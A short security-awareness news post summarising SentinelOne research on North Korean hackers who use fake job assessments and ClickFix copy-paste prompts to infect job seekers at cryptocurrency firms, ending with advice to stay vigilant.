.jpg?width=400&height=276&name=iStock-1144604134%20(1).jpg)
North Korean hackers behind the “Contagious Interview” campaign are using the ClickFix social engineering tactic to target job seekers with phony employment offers, according to researchers at SentinelOne.
“ClickFix typically proceeds as follows,” the researchers explain. “A targeted job seeker receives an invitation to participate in a job application process, directing them to a lure website where they are prompted to complete a skill assessment.
“During the assessment, the applicant encounters a fabricated error message, such as a camera access issue. They are then instructed to copy and paste command lines, often involving utilities like curl, to download and execute a supposed update from a separate malware distribution server, unknowingly deploying malware in the process.”
The attackers are primarily targeting marketing and finance employees at cryptocurrency companies, using “lures involving various job positions, such as Portfolio Manager, Investment Manager, and Senior Product Manager, across a range of impersonated companies including Archblock, Robinhood, and eToro.”
The attackers frequently rotate their infrastructure to stay ahead of defenders, setting up new domains to avoid detection.
“Given the continuous success of the campaign in engaging job applicants, the threat actors may be prioritizing maintaining operational readiness and meeting their objectives by rapidly deploying new assets to replace disrupted infrastructure, rather than undertaking large-scale targeted changes,” the researchers write. “We observed a high rate of new infrastructure deployment by the Contagious Interview threat actors alongside losses of existing infrastructure due to actions by service providers, which supports this assessment.”
The researchers conclude, “[A] critical element in mitigating this threat is the human factor. It is important that job seekers, particularly those within the cryptocurrency sector, exercise heightened vigilance when engaging with employment offers and associated assessments.”
KnowBe4 empowers your workforce to make smarter security decisions every day. Over 70,000 organizations worldwide trust the KnowBe4 HRM+ platform to strengthen their security culture and reduce human risk.
SentinelOne has the story.
